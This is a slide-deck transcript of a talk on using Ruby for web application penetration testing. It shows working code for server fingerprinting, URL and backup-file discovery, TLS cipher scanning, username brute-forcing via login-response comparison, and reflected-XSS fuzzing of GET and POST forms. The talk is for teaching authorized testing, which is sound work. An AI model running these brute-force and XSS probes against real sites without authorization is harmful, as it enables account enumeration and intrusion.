Solid as Diamond: use ruby on a web application penetration test (for www.fdtict.it)

Solid as Diamond
Using Ruby in a web application penetration test
Wednesday, September 18, 13

View Slide

self.inspect
• I do stuff: husband, proud father
&& martial artist
• I break other people code for living
(only when authorized)
• I blog at: http://armoredcode.com
• I’m on github too: https://
github.com/thesp0nge
• I love twitter: @thesp0nge,
@armoredcode
2

View Slide

talk.inspect
• Owasp Top 10 2013
• Ruby code to...
• Leverage a web application attack surface
• Bruteforce authentication mechanism
• Look for Cross site scripting
3

View Slide

Disclaimer
4
Attack only sites you’re authorized to

View Slide

Change your mindset. You’re an attacker now!
5
Your web application is a blackbox
You’ve got only a URL as a starting point
(optional) You may have a valid user, instead you have to register a
user to the application
Good luck!

View Slide

It all starts with...
6
... someone wants to publish a new web
application on the Internet or on an Internal
network, she gives me the url saying:
“test it for security issues, please”...

View Slide

Our target
7

View Slide

The Owasp Top 10 - 2013
8
• A1 – Injection
• A2 – Broken Authentication and Session Management
• A3 – Cross-Site Scripting (XSS)
• A4 – Insecure Direct Object References
• A5 – Security Misconﬁguration
• A6 – Sensitive Data Exposure
• A7 – Missing Function Level Access Control
• A8 – Cross-Site Request Forgery (CSRF)
• A9 – Using Known Vulnerable Components
• A10 – Unvalidated Redirects and Forwards
https://www.owasp.org/index.php/Top_10_2013

View Slide

Leverage your attack surface
9

View Slide

Leverage your attack surface
10
Spot attack entrypoints:
(robots.txt and url
discovery with bruteforce)
Fingerprint your target
Check transport layer
security
Check for the service door
(backup ﬁles)

View Slide

11
• Meta generator tag
• Server HTTP response field
• X-Powered-by HTTP response field
• Popular pages with extension (login.do,
index.jsp, main.asp, login.php, phpinfo.php...)
• The HTTP response field order (soon it will be
implemented in the gengiscan gem)

View Slide

12
def detect(url)
uri = URI(url)
begin
res = Net::HTTP.get_response(uri)
{:status=>:OK, :code=>res.code, :server=>res['Server'],
:powered=>res['X-Powered-By'], :generator=>get_generator_signature(res)}
rescue
{:status=>:KO, :code=>nil, :server=>nil, :powered=>nil, :generator=>nil}
end
end
def get_generator_signature(res)
generator = ""
doc=Nokogiri::HTML(res.body)
doc.xpath("//meta[@name='generator']/@content").each do |value|
generator = value.value
end
generator
end
$ gem install gengiscan
$ gengiscan http://localhost:4567
{:status=>:OK, :code=>"404", :server=>"WEBrick/1.3.1 (Ruby/
1.9.3/2012-04-20)", :powered=>nil, :generator=>""}

View Slide

Spot attack entrypoints
13
robots.txt to discover
to ﬁngerprint

View Slide

14
# TESTING: SPIDERS, ROBOTS, AND CRAWLERS (OWASP-IG-001)
def self.robots(site)
site = 'http://'+site unless site.start_with? 'http://' or site.start_with? 'https://'
allow_list = []
disallow_list = []
begin
res=Net::HTTP.get_response(URI(site+'/robots.txt'))
return {:status=>:KO, :allow_list=>[],
:disallow_list=>[],
:error=>"robots.txt response code was #{res.code}"} if (res.code != "200")
res.body.split("\n").each do |line|
disallow_list << line.split(":")[1].strip.chomp if (line.downcase.start_with?('disallow'))
allow_list << line.split(":")[1].strip.chomp if (line.downcase.start_with?('allow'))
end
rescue Exception => e
return {:status=>:KO, :allow_list=>[], :disallow_list=>[], :error=>e.message}
end
{:status=>:OK, :allow_list=>allow_list, :disallow_list=>disallow_list, :error=>""}
end
$ gem install codesake_links
$ links -r http://localhost:4567

View Slide

15
• Use a dictionary to discover URLs with
bruteforce
• Very intrusive attack... you’ll be busted, be
aware
$ gem install codesake_links
$ links -b test_case_dir_wordlist.txt http://localhost:4567

View Slide

Check transport layer security
16
$ gem install ciphersurfer
$ ciphersurfer www.gmail.com
Evaluating secure communication with www.gmail.com:443
Overall evaluation : B (76.5)
Protocol support : ooooooooooooooooooooooooooooooooooooooooooooooooooooooo
(55)
Key exchange : oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo
(80)
Cipher strength : oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo
(90)
Evaluate an SSL connection for:
• protocols the server supports
• cipher length
• certiﬁcate key length

View Slide

Check transport layer security
17
def go
context=OpenSSL::SSL::SSLContext.new(@proto)
cipher_set = context.ciphers
cipher_set.each do |cipher_name, cipher_version, bits, algorithm_bits|
request = Net::HTTP.new(@host, @port)
request.use_ssl = true
request.verify_mode = OpenSSL::SSL::VERIFY_NONE
request.ciphers= cipher_name
begin
response = request.get("/")
@ok_bits << bits
@ok_ciphers << cipher_name
rescue OpenSSL::SSL::SSLError => e
# Quietly discard SSLErrors, really I don't care if the cipher has
# not been accepted
rescue
# Quietly discard all other errors... you must perform all error
# chekcs in the calling program
end
end
end
protocol_version.each do |version|
s = Ciphersurfer::Scanner.new({:host=>host, :port=>port, :proto=>version})
s.go
if (s.ok_ciphers.size != 0)
supported_protocols << version
cipher_bits = cipher_bits | s.ok_bits
ciphers = ciphers | s.ok_ciphers
end
end

View Slide

Check for the service door
18
require 'anemone'
require 'httpclient'
h=HTTPClient.new()
Anemone.crawl(ARGV[0]) do |anemone|
anemone.on_every_page do |page|
response = h.get(page.url)
puts "Original: #{page.url}: #{response.code}"
response = h.get(page.url.to_s.split(";")[0].concat(".bak"))
puts "BAK: #{page.url.to_s.split(";")[0].concat(".bak")}: #{response.code}"
response = h.get(page.url.to_s.split(";")[0].concat(".old"))
puts "OLD: #{page.url.to_s.split(";")[0].concat(".old")}: #{response.code}"
response = h.get(page.url.to_s.split(";")[0].concat("~"))
puts "~: #{page.url.to_s.split(";")[0].concat("~")}: #{response.code}"
end
end

View Slide

Demo
19

View Slide

Bruteforce authentication
mechanism
20

View Slide

Am I vulnerable?
21

View Slide

Am I vulnerable?
22

View Slide

How do I break this?
23
1. Use an existing user to check the HTML

Wrong password for admin user

2. Place a canary string to anonymize the
output

Wrong password for canary_username
user

3. Submit the post and check if the response is the
one expected with the canary substituted

Wrong password for tom user


View Slide

24
def post(url, username, password)
agent = Mechanize.new
agent.user_agent_alias = 'Mac Safari'
agent.agent.http.verify_mode = OpenSSL::SSL::VERIFY_NONE
username_set = false
password_set = false
page = agent.get(url)
page.forms.each do |form|
form.fields.each do |field|
if field.name.downcase == 'username' or field.name.downcase== 'login'
username_set = true
field.value = username
end
if field.name.downcase == 'password' or field.name.downcase== 'pass' or
field.name.downcase== 'pwd'
password_set = true
field.value = password
end
end
return agent.submit(form) if username_set and password_set
end
return nil
end

View Slide

25
log("existing user #{username} used as canary")
wrong_pwd = post(url, username, "caosintheground").body.gsub(username, 'canary_username')
wrong_creds = post(url, "caostherapy", "caosintheground").body.gsub("caostherapy",
"canary_username")
if ! line.start_with?("#")
sleep(@sleep_time)
log("awake... probing with: #{line}")
r= post(url, line, ".4nt4n1")
found << line if r.body == wrong_pwd.gsub("canary_username", line)
end

View Slide

Demo
26

View Slide

Look for Cross Site Scripting
(reflected)
27

View Slide

28

View Slide

29

View Slide

30
• In GETs
• Submit the attack payload as parameter in the query string
• Parse HTML and check if payload is in the script nodes
• In POSTs
• Get the page
• Find the form(s)
• Fill the form input values with attack payload
• Submit the form
• Parse HTML and check if payload is in the script nodes

View Slide

31
attack_url = Cross::Url.new(url)
Cross::Attack::XSS.each do |pattern|
attack_url.params.each do |par|
page = @agent.get(attack_url.fuzz(par[:name],pattern))
@agent.log.debug(page.body) if debug?
scripts = page.search("//script")
scripts.each do |sc|
found = true if sc.children.text.include?("alert('cross canary')")
@agent.log.debug(sc.children.text) if @options[:debug]
end
attack_url.reset
end
end
Exploiting GETs...
$ gem install cross
$ cross -u http://localhost:4567/hello?name=paolo

View Slide

32
begin
page = @agent.get(url)
rescue Mechanize::UnauthorizedError
puts 'Authentication failed. Giving up.'
return false
rescue Mechanize::ResponseCodeError
puts 'Server gave back 404. Giving up.'
return false
end
puts "#{page.forms.size} form(s) found" if debug?
page.forms.each do |f|
f.fields.each do |ff|
ff.value = "alert('cross canary');"
end
pp = @agent.submit(f)
puts "#{pp.body}" if debug?
scripts = pp.search("//script")
scripts.each do |sc|
found = true if sc.children.text == "alert('cross canary');"
end
end
Exploiting POSTs...
$ gem install cross
$ cross http://localhost:4567/login

View Slide

Demo
33

View Slide

What we learnt
34
• Don’t trust your users
• “Security through obscurity” is EVIL
• Testing for security issues is a mandatory
step before deploy
• HTTPS won’t safe from XSS or SQL Injections

View Slide

Some links before we leave
35
http://armoredcode.com/blog/categories/pentest-with-ruby/
https://github.com/codesake
http://ronin-ruby.github.com/
https://github.com/rapid7/metasploit-framework
http://www.owasp.org
http://brakemanscanner.org/
Not mine, here because they’re
cool
http://www.youtube.com/user/armoredcodedotcom

View Slide

Questions?
36

View Slide

Thank you!
37

View Slide

Solid as Diamond: use ruby on a web application penetration test (for www.fdtict.it)

Solid as Diamond: use ruby on a web application penetration test (for www.fdtict.it)

Paolo Perego

More Decks by Paolo Perego

Other Decks in Programming

Featured

Transcript